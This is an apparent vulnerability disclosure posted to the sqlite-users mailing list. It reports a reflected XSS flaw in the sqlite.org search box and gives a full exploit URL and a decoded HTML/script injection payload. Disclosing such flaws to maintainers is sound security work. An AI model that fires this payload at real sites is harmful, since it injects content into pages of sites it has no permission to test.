xss

classic Classic list List threaded Threaded
1 message Options
Reply | Threaded
Open this post in threaded view
|

xss

Girdap
Hello,

I found website in reflected xss;

1.destination: http://www.sqlite.org/

Applicable address:

1.destination: http://www.sqlite.org/search?s=

First, "I entered the
http://www.sqlite.org/search?s=d&q=select%22%3E%3C%2Ftitle%3Ealert%28XSS%2520A%C3%A7%C4%B1%C4%9F%C4%B1%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C%2Fh1%3E%3C%2Fmarquee%3E%253D
" ...

problem area: search box

note: I would advise you to take care of csrf tokens available ...

Payload :
"></title>alert(XSS%20Açığı)</script>><marquee><h1>XSSaçığı</h1></marquee>%3D

impact : https://www.owasp.org/index.php/Reflected_XSS


SS :

twitter.com/hamit_cibo
https://hackerone.com/thegirdap
[hidden email]
_______________________________________________
sqlite-users mailing list
[hidden email]
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users